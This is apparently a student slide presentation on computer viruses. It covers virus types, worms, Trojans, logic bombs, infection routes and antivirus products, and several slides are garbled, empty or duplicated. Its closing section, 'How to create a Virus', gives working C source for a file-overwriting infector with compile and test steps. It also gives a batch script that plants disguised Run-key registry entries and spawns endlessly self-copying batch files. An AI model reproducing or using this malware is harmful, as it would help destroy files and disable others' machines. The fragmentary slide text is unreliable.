Académique Documents
Professionnel Documents
Culture Documents
HCE-108
PROJECT
BY
VINAY KUMAR
1
Project Topic:
Computer Virus
2
INDEX
3
Introduction to computer virus:
4
What is computer virus?
In computer security technology, a computer virus is a self-
replicating or self-reproducing-automation computer program that
spreads by inserting copies of itself into other executable code or
documents. A computer virus behaves in a way similar to a
biological virus, which spreads by inserting itself into living
Cells. Extending the analogy, the insertion of a virus into the
program is termed as an "infection", and the infected file, or
executable code that is not part of a file, is called a "host". Viruses
are one of the several types of malicious software or malware.
While viruses can be intentionally destructive, for example, by
destroying data, many other viruses are fairly benign or merely
annoying. Some viruses have a delayed payload, which is
sometimes called a bomb. For example, a virus might display a
message on a specific day or wait until it has infected a certain
number of hosts. A time bomb occurs during a particular date or
time, and a logic bomb occurs when the user of a computer takes
an action that triggers the bomb. However, the predominant
negative effect of viruses is their uncontrolled self-reproduction,
which wastes or overwhelms computer resources.
Definition:
5
The computer viruses are broadly classified into following
categories:
• Macro virus
• Polymorphic viruses
• Stealth viruses
• Multi-partite viruses
6
Boot sector virus:
Boot sector viruses are those that infect the boot sector on a
computer system. They first move or overwrite the original boot
code, replacing it with infected boot code. They will then move
the original boot sector information to another sector on the
disk, marking that sector as a bad spot on the disk so it will not
be used in the future. Boot sector viruses can be very difficult to
detect since the boot sector is the first thing loaded when a
computer is starts. In effect, the virus takes full control of the
infected computer.
Examples:
Form, Disk killer, Michelangelo, Stoned.
Examples:
AntiEXE, Unashamed, NYB
7
File infector virus:
Examples:
Snow.A,
Jerusalem,
Cascade
8
Macro virus:
Examples:
Concept,
Nimda,
Melissa.
9
Polymorphic viruses:
Stealth viruses:
Multi-partite viruses:
Multi-partite viruses are those that infect both boot sectors and
executable files. They are the worst viruses of all because they
can combine some or all of the stealth techniques, along with
polymorphism to prevent detection.
10
Destructive non virus programs:
© Worms
© Trojan Horses
© Logic Bombs
Worms:
Viruses are far from the only maverick programs that can disrupt
a computer system. Worms are constructed to infiltrate
legitimate data processing programs and alter or destroy the
data. Often what people believe is a virus infection is, in fact, a
worm program. This is not as serious because worms do not
replicate themselves. But the damage caused by a worm attack
can be just as serious as a virus, especially if not discovered in
time. For example, suppose a worm program instructs a bank’s
computer to transfer funds to an illicit account. The fund
transfers may continue even after the worm is destroyed.
However, once the worm invasion is discovered, recovery is
much easier because there is only a single copy of the worm
program to destroy since the replicating ability of the virus is
absent. This capability may enable it to re-infect a system
several times. A worm is similar to a benign tumor while a virus
is like a malignant one.
11
Definition:
Computer worms:-
Blaster,
Code red,
Fog,
ILOVEYOU,
WANK,
Witty.
12
Trojan horses:
Trojan Horses are usually more subtle, especially when they are
used for embezzlement or industrial espionage. They can be
programmed to self-destruct, leaving no evidence other than the
damage they have caused. A Trojan Horse is particularly
effective for the common banking crime known as ‘salami
slicing’ in which small sums unlikely to be noticed are sliced off
a number of legitimate accounts and moved to a secret account
being operated by the thief.
Definition:
Trojan horse:
13
Trojan is another type of malicious software that appears to
perform a certain action but in fact performs another.
And often these hidden actions are for negative purpose only
like:
• AIDS
• Beast Trojan
• Bifrost
• Nuclear RAT (NR, NucRat)
• Insurrection
• Bandook
• Optix Pro
• Shark
14
Logic Bombs:
The built-in delay has been used to hold software “hostage” until
a ransom is paid. These ransom demands are usually announced
via a message to the user warning them to “pay up and we will
tell you how to turn off the bomb”. Logic bombs can also be
insurance for suppliers or consultants who set up a computer
system, causing data to be destroyed if their bills are not paid.
This threat was used when a Maryland library refused to pay for
a system that did not function properly; fortunately the bomb
was found before any data could be damaged. When trying to
assess whether a computer system has fallen victim to a virus,
logic bomb, worm or Trojan horse.
15
How viruses affect and infect your PC.
Before you can safeguard your system against viruses, it’s
important to understand how they spread and what they do to
infected systems. The best virus protection program is
consistent, ongoing education of computer users about the virus
threat. Even with the proliferation of on-line services and
communications, most viruses are still spread via infected floppy
disks. The front line in the war against viruses must be fought by
the user who is about to put a disk into the drive. Without an
effective, ongoing education campaign, virus fighting efforts
will be doomed to lighting backfires against infections already in
place.
16
© An instructor distributes disks to students so they can
complete a class assignment. One student decides to do his
homework in the office at night. Unfortunately, the instructor
was not vigilant and distributed infected disks to the entire class.
© A friend gives you a disk so you can try out a new graphics
program. The infection on your friend’s machine spreads to
yours when you run the program for the first time. (The nifty
graphics available don’t quite compensate for the three weeks
you spend reconstructing your lost data files.)
17
Common virus infection symptoms:
Of course, these are not the only symptoms that may present
themselves if you have a virus. The best way to detect a virus is
to use anti-virus software, which is described in the following
sections.
18
TIPS to protect from VIRUSES:
Viruses can come from many different origins, so it is important
to protect yourself from potential problems
19
`ANTIVIRUS SOFTWARE:
Anti-virus software is any software that protects your computer
from viruses, or eradicates viruses that have already been
contracted on the computer. Below are some popular anti-virus
programs and links to their corresponding web pages. It should
be mentioned, however, that many of these sites (as well as other
sites) may offer free software or trial software. Also, here at
BGSU, you can obtain free copies of virus software. An un-
keyed version of virus software can be downloaded from the
BGSU software server at http://software.bgsu.edu/ when
students are on campus. BGSU has a site license for McAfee
Virus Scan for the PC and Virex for the Mac.
ALADDIN ESAFE
Aladdin eSafe :-
20
MCAFEE VIRUSSCAN
McAfee:
Norton Antivirus:
21
Using antivirus is a must ….
This fig. will show you how the antivirus helps to detect viruses
in your PC.
You have to change the settings of the antivirus you are using in
order to delete or move the virus etc...
22
Learning more about computer Virus:
23
• Trend Micro Virus Information Center
(www.antivirus.com/vinfo/)
• Viruslist.com (www.viruslist.com)
SUMMARY
24
How to create a Virus
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
25
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
26
COMPILING METHOD:
3. Note down the size of generated EXE file in bytes (SEE EXE
FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down
size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE
IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated
EXE File is ready to infect
27
HOW TO TEST:
3. Run the virus EXE file there you will see all the files in the
current directory get infected.
That’s it
It creates a reg file and puts it in the registry then it creates a file
in C:\ called 2.bat the 2.bat file copy’s itself into other files and
opens them each file does the same 2.bat but they EACH loop so
it keeps on opening other batches that each loop and open other
batches the only way out is to boot in safe mode.
28
del C:\1.reg
>>"C:\1.reg" ECHO windows Registry Editor Version 5.00
>>"C:\1.reg" ECHO
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows
\Cur rentVersion\Run]
>>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
>>"C:\1.reg" ECHO "MCUpdateExe"="c:\\2.bat"
>>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
>>"C:\1.reg" ECHO "Norton"="c:\\windows\\1.bat"
>>"C:\1.reg" ECHO "System"="c:\\windows\\2.bat"
>>"C:\1.reg" ECHO "autoexec"="c:\\windows\\3.bat"
regedit.exe /s C:\1.reg
>>"C:\2.bat" ECHO :1
>>"C:\2.bat" ECHO copy 2.bat C:\3.bat
>>"C:\2.bat" ECHO copy 2.bat C:\4.bat
>>"C:\2.bat" ECHO copy 2.bat C:\5.bat
>>"C:\2.bat" ECHO start C:\2.bat
>>"C:\2.bat" ECHO start C:\3.bat
>>"C:\2.bat" ECHO start C:\4.bat
>>"C:\2.bat" ECHO start C:\5.bat
>>"C:\2.bat" ECHO copy C:\2.bat C:\windows\1.bat
>>"C:\2.bat" ECHO copy C:\3.bat C:\windows\2.bat
>>"C:\2.bat" ECHO copy C:\4.bat C:\windows\3.bat
>>"C:\2.bat" ECHO start C:\windows\1.bat
>>"C:\2.bat" ECHO start C:\windows\2.bat
>>"C:\2.bat" ECHO start C:\windows\3.bat
>>"C:\2.bat" ECHO goto 1
start 2.bat
del C:\1.reg
29